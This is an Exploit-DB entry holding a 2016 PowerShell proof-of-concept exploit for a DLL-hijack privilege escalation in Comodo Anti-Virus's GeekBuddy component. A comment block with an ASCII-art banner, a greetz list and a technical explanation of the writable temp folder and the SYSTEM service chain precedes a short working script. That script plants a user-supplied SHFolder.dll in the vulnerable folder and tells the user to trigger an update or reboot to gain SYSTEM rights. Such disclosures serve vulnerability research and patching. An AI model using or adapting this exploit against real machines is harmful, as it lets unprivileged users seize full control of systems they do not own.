Comodo Anti-Virus - 'SHFolder.dll' Local Privilege Escalation

EDB-ID:

39508

CVE:

N/A
Platform:

Windows

Date:

2016-02-29


<#


                          ````......````                               
                       ``,;''''''''''''''''';,`                            
                      .;''''''''''''''''''''''''''',`                          
                    `:''''''''+';:,.``````.,:;'''''''''':`                         
                   ,;'''''';,.`         ``,;'''''';:                        
                 `:'''''',.              `,'''''';.                      
                `;+''+':`         ,;       `,''''';.                     
               `;'''';.       ``  .:;'` `.       `;'''''.                    
             ` :+''';`     `,``:+''  ';;'`,''; ``  ``   :'''';`                   
              .'''';`      ,';' '':'` ';,'`'',' :''' .''`    :'''',                   
             `;''''`     ;'' :+.` ;';,  ';:' ''''`,;:+ '',     `;''''`                  
            .''''.   ;:`, .'.':`'''.:;`;. +;:' '::; ;''' ';      .'''',                 
            :''';`  ` '''',`':'' ..;:`','` '''' ':;;`'`';`':`  :;    :''';                 
           ;''+,   .;`.'.'' ';.'`';': ,:. ` ` ` `,: .';',,'`;'.`';':    .+'''`                
          `''''`   ;'; ''.'.,','` ,`         ``;`'' .`;'`''+:    ;'''`               
          `''''  ., .'' ,'.'' ;;.     ````````     `. ``'::'`;; `   :'''.               
         ``''':  `+,` .':`'','    `,;''''''''''+'':.`    ;'.+:;'``':   .'''.              
         `''',   '',  ''`:;   `:'''''''''''''''''''''';.   `;'`': ''`'`   .''',              
        `''',  `  `''` `';   .''''''''''''''''''''''''''''';`  `.;' ;'.''`.:  `''',             
        `''',   :''.`''  `  ,;'''''''''''''''''''''''''''''''';. ` `,.'::', ''`  .'''.             
        ''',   '.''`,':   ,'''''''''''''''''''''''''''''''''''''', ` .+,'; '';   .'''`            
       ''':    ''`'' ;.  `'''''''''''''''''';:::;';'''''''''''''''''.  ;' :': ,,`  .'''            
       :'';    `''.'` ` :''''''''''''';:::.',  `''';`:;'+'''','''''+;  `,'; :'''   ,'''            
      .'''   ``  .++;  `''''''''''''`.   `':  ''';  `:''' :'''''''.  .+ :''.+.   :'':           
      `''+   :'':  ``  ,'''''''''''''    `':  ''';    `: ,'''''''':  .`''.''  `  '''`           
      ;''.  `+.',;   ;'''':''''''''; `   ', .'''':    ` :''''';''';  `'.',`,',  `+''           
     ,'':   '';,'.  ;''''':''''''''`+`   ;..`;'+''.    '.:''''';'''''```.+' +:'`  .'';          
     `'''  `;``+',;.` ;''''':''''''''.';   `;'',  '`    '' ;''''','''''`  ;,+.+.   ;''.          
     ;'+.  :'': ;':  ;'''''':''''':',''.   `'';.+' '`    ,'; .'''';''''''` `+.':`   `'''          
    `'':  .+`;''` ` ;'''''':''''''.::''.   .''.   ::    `'';`,'''':''''''` :+'.    ,'',         
    '''`  :''.:''  :''''''':'''''; :''''   .'',  `.,;   :+'`''': ;''','''''''  ,`     '''         
    .'':   `'';`` ,''''''':;''''':`''';',   ,''+` ,+':'   +'''''''`,''''''''''';     .+` .'':         
    '''  `''. :', `''''''':`'''''+.;';.:::::::,,''';`'': .   .'''''''; ''''.''''''',  ` ;'':  '''         
   .'',  ','';`.  '''''''; :'''''' `,;'''''''''.```  .  ''''';:,`:;''+`'''',,'''''''`  :'';`  `+':        
   '''`  ''.,';  ;''''''; ''''',`,'''''''''''''.....,,,.`''''''''';;,,;.''''; :'''''''  '''.    ;''        
   `'':   .'';:; `'''''''` .+'', ,''''''''''''; '''''''++`''''':..:'''' `''''' ;'''''', .,  ``  .'',        
  ` :''    :''` ''''''+` ;''``;'''''''''''''':``,,.`````,'''''.    ';.;'''` `'''''''`   .++.  '';        
   +''       ,'''''':  ;+`,'''''''''''''''''+''';;;;'''''''+`    :;+,`''. `.'''''';  .+'''`  :'+`       
  ,''.  ':    +''''';  ,,;''''''''''''''''''''''''''''''''''. `.::,` `';.',  ;''''''` :'': `. `'';       
  ;''  :;.;':  ,''''''.  `''''';;;,`.:'''''''''''''''''''''''''.;''''''':`;;;,  `''''''; `.; .;'+` ;''       
  '': ` ;';';'  '''''';   ''';;''''''',`.'',`  .:;;''''''''''.,'''''''''''.;;.  ,''''''  `;''''.  .''`       
  .''.  .';`;' .''''''.  :+;;''''''''''': ;'  ::::...;''+'':,'''';..``;''';.   ''''''; `:''.`':  `'':       
  :''   ` ,'` ;''''''.  :;'''''''''''''';`;,        `,''';` .:;;;'''':   ,''''''  .,''',  '''       
  ;';  ''';,` `''''''''''` :''''''''''';.:'''`';:`      ,''';`;''''''''''',   ''''''. ;';,`   :''`      
 `'',  .;,'''; ,'''''''''' ;'''''''''':`  :'''`::`     ``'''',+''''''''''''+`   ;'''''; .``.:;`  `''.      
 .''`  `+;'`;` '''''''''';.'''''''',`    ''';`       :''';'''';::;'''''';;  ` `''''''` ;'';;;  `+':      
 :''   ..;'' `''''''''''`'''''''',     .'''`      `+''';''.   ,'''''''''''''''''''''''''''''''''''''':`    
 ;''  :. `` .'''''''''';''''''''      ;'';      ;''':::`    :'''''''''''''''''''''''''''''''''''''''',   
 ;':  '''':` :'''''''''''''''''',`     .'''      ''''.     `+'''''''''''''''''''''''''''''''''''''''''  
 '',  :,;'': ;''''''''''''''''''`      ;''...    :''''`      :''''''''''''''''''''''''''''''''''''''''''` 
 `''.  `+'':,` '''''''''''''''''';       ,'';.+`   . ,;'''      `''''''''''''''''''''''''''''''''''''''''''; 
 .''.  `.,;';  '''''''''';''''''',       ''',+. `` .' .'''       ''''''''+'''''''''''''''''''''''''''''''''', 
 .'+`  ;'''''     `` '''''''`       `;''''.'++','`+.'''       '''''';              `;+'''''' 
 ,''            ''''';;        ,'''';'''';'``.'''       :''''''`               .'''''':
 :'+            '''''':        .'''';'''';'` .'''       ,''''''`               ,''''';
 :''      ,''''',   ''''''`        .'''';'''';', .'''`      .''''''`                ''''''
 ;'' `''''''; :''''',   ''''''        .'''';'''';':,''''.      .''''''`                ''''''
 ;'' `';''''' :''''',   :'''';        :''''''''';''.'''''      `''''''`                ;'''''
 ;''      :''''',   ,'''''        `+''''''''':''.'''''`      ,''''';                ''''''
 :'+      ,''''',   `'''''.       ,'''''''''':''::'''';      ;''''':                `''''''
 :''   ```. ,''''':   ''''':       `''''''''''',''+`'''''.     `''''''.                :''''''
 ,''` `''''''' .''''';   `''''':       '''''''''''';''',,''''',    '''''''                ,'''''',
 .''` `''':,.; `''''''   `'''''':      '''''''''''''';'''`'''''':.  `,''''''',               .'''''''' 
 `''` `,;;;''` ''''''   `'','''';,`   `,''''''''''''''',''':.''''''''''''''''''':`   ;'''''''''''''''''''''''''''''', 
 '',  `+';;,  ''''''   `''`,'''''''''''''''''''''''''''':''''.:''''''''''''''''',+   ''''''''''''''''''''''''''''''; 
 '':  `  `,. ;'''''.  `''' .''''''''''''''''''''''''''''.''''`;''''''''''''''':;;   `''''''''''''''''''''''''''';';  
 ;';  ,''''; :''''':  `''''``'''''''''''''''''''''''''''`:''''`;''''''''''''';,',   ,'''''''''''''''''''''''''''';  
 ;''  ';;,.. .''''''  `''';; :''''''''''''''''';'''''''. '''''`;'''''''''''';+'`   ;'''''''''''''''''''''''''';.   
 :''  `,:;'''  ''''''`  `'''`';` `;'''''';,''''''';''''''', .'''''..''''''''''''+:   '''''''';''''''''';''''';,`    
 .''.  .''',`  ;''''': ` ''':;''. ````` :+'''''',;''''''', '''''';..;''''''''''`   `''''''  `,'':  `+':      
  '':  ` .;. ,'''''+  .'';,'''''''';:''''''''','''''''': ;'''''''''.`,'''''''   ;'''''; ,'',   .''.      
  '';   :+.++` `''''''.  +'''`'''''''''''''''''''.''''''''', .''';;'':,,'''''''',   ''''''. ':''',  :''`      
  :''  ,';:.'. ;''''''  ''''.:''''''''''''''''';;'''''''''''.'''. `:;'''''':'':   :''''''  ';,.:'  '''       
  .''.  .;:'''  .''''''` ,'''':`''''''''''''''''':''''''''''';''''.`;'''''''''.'''',  '''''':  ,'''',  `'':       
  '';  ;';, ;` '''''';.+''''' ''''''''''''''''':''''''''''': :'':'''''''''',;''''': :'''';'  ,. .;:  ,''`       
  ;''    `;', `,'''''''''''''.,'''''''''''''';','''';:.``  `,.;'''''''''''.+''''''.''''''; ,'+'.   '''       
  .''.  '''';`  ''''';''''''';`'''''''''''''':.'';:,;'''':` ,:`:''''''''','',`:''':''''''` '.:'''  `'':       
   '''  :'': `:. ,'''';;'''''''`;'''''''''''',:';`:'',,``.:'. `':`+''''''';:'',':';.''''''; `'''..'  :''        
   :''` `,. ;:++` ''''';,'''''';`''''''''''';;',.''....,.. ,';:.'.`'''''''.'''','';+'''''' ;. ,+''`  '';        
   `'':  `'',`;: `'''''',''''''.:''''''''''`+.,';:''''''';.:''':'`,''''''`'''':''''''''', :':;` ,'  ,'',        
   ;''`  `+.''+` ` :'''''','''''' '''''''''' `.'''''''''''''::'''', +'''':,''''`;'''''''' +.''+;   '''        
   `'':  ;'';` `  ''''''':''''';`'''''''', '''''''''''''''.,''''`''''',:''''`,'''''''` '''.:';  .'':        
    ''+`  ,` ,+: `'''''','''''':`'''''''` :''''''''''''';  ;'''`+''''`;'''':+''''''.` ` :'':;,  '''         
    .'':   ;';''.  .'''''';'''''',`'''''+ ''''''''''''''` .,'';.''''' '''''''''''':  +'``;';  .'',         
    ''+`  :''; ,'` :''''','''''''.,''''' ,'''''''''''''' :''''';''''','''';'''''';  ,.''. .``  '''         
    `';;  `+. ;'':' :''''':'''''''.:'''; ;''''''''''''': `'''''''''''.'''''.''''''  :';`'';   :''.         
     :'',`  `'':.''` ;'''';;:''''''`'''; '''''''''''''': .'''''''''''.''',;''''''  ` :''.'''` `'''          
     '''   ;'.:''`  ;''''';:''''':''';.'';''''''''''': ,'''''''''':;'':+''''''` .''``'+',:  '''`          
     .';;  `;;';  `  :''''':'''''';'''`'';''''''''''': ,''''''''''`''';''''';  .,''` :`  ,'':          
      ;'',  `',  `'.  ,''''';''''';'''''':''''''''''': .''''''''',`+';,'''';  ``.''';  ``'''           
      '''`    `'';: ` .'''':'''''`'''''';;''''''''''; `'''';'''',.`''+,'',  ,'`:'''''`  '''`           
      .'''    ;'.''  `;''''''''.''''''':'''';:,''';. ,''';''''',;'''',`  `;''''''';.  ;'',           
       ,'';   ''.;',   ,';''''';,''''''`+,`  .;:;''',,'';'''+.;''''',```:+,''''''''''.:'';            
       ;'';  ''';',  '.  `,''''''.'''''' `.:;'+''''+''';.,.''':,''''''` ``'''''''''''''',''            
        ''':  .,,':  :':  +''''''',''';.:'+,.`   `.:''':`''''''''''; `'':'''''''''''''',`            
        ''':   `  .'' `'`;'''''''..,.:+,`  ``.,.`  ,'''`;'''''''+.';'.:'''':;'''''+:.'`            
         ''':   ;:`+'` ,:..,''''''; .+:  `:'+''''';`  ;'; .''''': `:';:+''';`''''''. .':            
         `''';  ; ;'.  .';'`;'''',;'.  .+''''''''''`  ;;'+:'''; .+'''''''';''''''.;,'';            
         `''''  ,';   :'`'`;'''':+`  `'''''''''''':   ;'';'''`;''''''''''''''''',.''';            
          `'''' ` `   `':. ';''.+.  `'''''''''''';   `'''''::'''.'''',`'''''': :';;''            
           ''''.    :;,'`:'.';',   '''''''''''':   ,'''','''..''': '''';;:,''. `''            
           :''':   `.+'' '''','    :''''''''''+.    ''''''':`'''' .''';:;`.'.:' ';            
            ,''''`   `,` ',;:'. `;;;,``'''::::;''; :';,  ,'''''' ;'''` +'''.''+'.:'+`':            
            `'''':   ` ;'':' '''''+;.; `` ,:`''''', `'''''`,'''' :'''.''''..''','.            
             :''''.    .,': :'''''''.`;'''';` .''''''` '''':`+'''``''',;'''``''';:'.            
              `'''''`   `.'` ''''''';`'''''''': ,'''''; ;'''`''''; ''';:'''. ;''',''             
               ,'''''`  `.'` '''''''.'''''''''', +'''''` ,'';.''''`''''`+''' ,''''`.:             
                :''''',  .' '''''''.'''';:.,'''`''''''. .''''''':.''',;'''``;,',' '.             
                `:+'''';..; '''''':,''':'''.:''.'''''': `'`''''' ''''`''': ' ::.:`+             
                 `,''''':' ''''''::''+`''',;''.;''''', `'.'''';`'''.;'''`:.,+`'`,:             
                   .;+':' '''''';.''''';`,'''.''''''` `'.''''.,'''`'''.`;`+;`' +              
                    .:+` '''''''`''''''+'''+.'''''; .' ;''' ;''.;,'' ' ''.:``:              
                     '. :'''''':.+'''''''',;''''', ;: ;''; '''.'.,;,,:'' '`'              
                     ;; `'''''''``;'''''',`,''''' `'` ''',.''',.:;`' ''.,.`;              
                     .+ ''''''' ` `.,,.`'; ''';  :; `''+`;'';;: :.;`',`; ;`              
                      +: `'''''``';;;;;'''', ``  `+. `''' '''::;;:;`;'`;..,               
                      ,' ``.. `+''''''''''+`   :' `'';`''':. ,.',''.; '               
                      `+'   :'''''''''''',  `+.` '',.''',. :,''''+ ;                
                      .',   ;''''''''''''.  ':  ''.,''':` ;.''''.,.                
                       :'.  :''''''''''',  ;'`  ''.:''',':;.''':.:                
                       ''.   ,:''''',`   ;+`   :'.:'''' ':`''; ;                 
                       `'',         ''.    ::,''''``; :, '                 
                        ;+;`       .'+`     ``'':'`,;  '``                 
                         ,'';.    `.'';`      :';'.,; '.                  
                         `,''';:::::;'''.        ``+;' +`                  
                           `,:''''';,`           ,,;                   SHFolder.DLL Local Privilege Elevation Exploit for Comodo Anti-Virus GeekBuddy Component by @Laughing_Mantis (Greg Linares)

Since it took 146 days to fix a DLL Hijack issue I decided to drop this PoC:

###Technical Geeky Stuff###

GeekBuddy stores several helper applications within the C:\ProgramData\Comodo\lps4\temp folder.
These binaries are individual components of the Comodo Security Suite and are executed whenever
their related function is performed, updated, or uninstalled.

The directory listing is as follows:
10/06/2015 12:08 AM  <DIR>     .
10/06/2015 12:08 AM  <DIR>     ..
10/02/2015 10:43 PM        27 download.cfg
10/02/2015 10:47 PM      637,864 setup_clps_application_vulnerability_monitor_release-4.10.307677.9.exe
10/02/2015 10:44 PM     2,196,272 setup_clps_autoruns_manager_api_release-4.14.330616.6.exe
10/02/2015 10:44 PM      547,088 setup_clps_boot_time_monitor_release-4.12.315371.9.exe
10/06/2015 12:07 AM     1,014,024 setup_clps_browser_addons_api_release-4.0.292287.4.exe
10/02/2015 10:44 PM      554,240 setup_clps_browser_addons_monitor_release-4.12.315370.6.exe
10/06/2015 12:06 AM      950,864 setup_clps_client_transaction_release-4.19.365037.89.exe
10/06/2015 12:08 AM      563,896 setup_clps_cross_selling_installer_monitor_release-4.12.318569.13.exe
10/02/2015 10:43 PM      768,032 setup_clps_cspm_alert_monitor_release-4.19.360508.5.exe
10/06/2015 12:08 AM      581,432 setup_clps_immaturely_closed_sessions_monitor_release-4.21.366534.6.exe
10/02/2015 10:47 PM      459,432 setup_clps_memory_monitor_release-4.10.301764.3.exe
10/02/2015 10:46 PM     1,152,480 setup_clps_system_cleaner_api_release-4.2.292287.3.exe
10/06/2015 12:07 AM     1,989,272 setup_clps_system_cleaner_monitor_release-4.12.317464.8.exe
10/06/2015 12:07 AM      648,912 setup_clps_windows_event_monitor_release-4.19.362032.8.exe
10/02/2015 10:43 PM         1 survey_version.txt
10/06/2015 12:05 AM  <DIR>     updates

The C:\ProgramData\Comodo\lps4\temp\ folder has the following permission configuration:

C:\ProgramData\Comodo\lps4\temp NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
                BUILTIN\Administrators:(OI)(CI)(ID)F
                CREATOR OWNER:(OI)(CI)(IO)(ID)F
                BUILTIN\Users:(OI)(CI)(ID)R
                BUILTIN\Users:(CI)(ID)(special access:)
                           FILE_WRITE_DATA
                           FILE_APPEND_DATA
                           FILE_WRITE_EA
                           FILE_WRITE_ATTRIBUTES

Notice how the folder allows Users to have FILE_WRITE_DATA and FILE_WRITE_EA access. This allows 
non-administrator users the ability to create files in the directory but not delete or modify 
existing files.

Comodo's main service engine is controlled by the SYSTEM service Launcher-Service.exe which resides
in the C:\Program Files (x86)\Common Files\COMODO\ folder. This service is auto launched by the 
registry key HKLM\System\CurrentControlSet\Services\CLPSLauncher

This binary will then launch Unit_Manager.exe in the C:\Program Files\COMODO\GeekBuddy with SYSTEM 
level privielges. This binary in turn then launches the binary C:\Program Files\COMODO\GeekBuddy\unit.exe 
to handle each sub process in the C:\ProgramData\Comodo\lps4\temp\ folder.

During client connections to update servers and Geek Buddy executions the unit.exe binary will 
launch the binary setup_clps_client_transaction_release-4.19.365037.89.exe. This setup binary has 
hardcoded DLL loading procedures to look for SHFOLDER.DLL in the current directory which it is 
executed from.

.data:00409240         dd offset aShfolder   ; "SHFOLDER"
.data:00409244         dd offset aShgetfolderpat ; "SHGetFolderPathA"

During this delay load procedure the exe will load SHFOLDER.DLL from its local directory before 
looking in the other PATHS variables.

By planting a malicious SHFOLDER.DLL in the C:\ProgramData\Comodo\lps4\temp\ and triggering an 
update or client connection to secure servers (which occurs automatically at user login) a user can 
elevate their privileges to SYSTEM and compromise the system fully.


######### GREETZ ######################################################################################
1st off all my new homies in the Vectra Networks Research Team - you guys are seriously legit mad #respect to everyone here. #Humbled

@taviso - keep killing it and thanks for being an inspiration
@bill_billbil - sup girl chicken rico n chill
@tacticalRCE - Its no 100 mile rides but will miss all the good times. C-ya around mang.
@hellNBak_ - drop tehm greetz like its 2003
@hacksforpancakes - make plans for other NullCon in 2016 ;)
@jduck - we gonna juke some more toyotas next time you come visit
@hdmoore - good luck with your ventures good sir
@jsoo - dont give up good sir - you're doing awesome
@thegrugq - when i grow up i hope im half as wise as you good sir
@daveaitel - Triangular Anus logos are the best
@da_667 - AYYYYYYYYYYYYYY LMAO
@bonovoxly - Clever Girls Wear Pink on Wednesdays
Derek Soeder - Respect to you brother, keep on being awesome
Benny 29A - next time im in CZ lets get beers, im buying
Yuji Ukai - #RESPECT to everything you have ever done and will ever do. #Ninja
Sizzop - for fixing my greetz

#########################################################################################################


#>

Param
(

  [Parameter(ValueFromPipelineByPropertyName = $true)]
  [string]$DLL = ""
)
if (!(Test-Path $DLL))
{
  throw "Fatal Error: The specified file: $DLL does not exist." 
}

Copy-Item -Path $DLL -Destination "C:\ProgramData\Comodo\lps4\temp\SHFolder.dll" -Force

Write-Host "Copying $DLL to the Comodo AV GeekBuddy's insecure temp folder as SHFolder.dll" -ForegroundColor Red


[void][System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")

$objNotifyIcon = New-Object System.Windows.Forms.NotifyIcon 


$MyPath = Get-Process -id $pid | Select-Object -ExpandProperty Path
$objNotifyIcon.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon($MyPath)
$objNotifyIcon.BalloonTipIcon = "Info" 
$objNotifyIcon.BalloonTipText = "Hijacked SHFolder.DLL with $DLL.
Now manually update Comodo Anti-Virus using the GUI or Reboot the system to gain SYSTEM Level Privileges" 
$objNotifyIcon.BalloonTipTitle = "@Laughing_Mantis"
 
$objNotifyIcon.Visible = $True 
$objNotifyIcon.ShowBalloonTip(8000)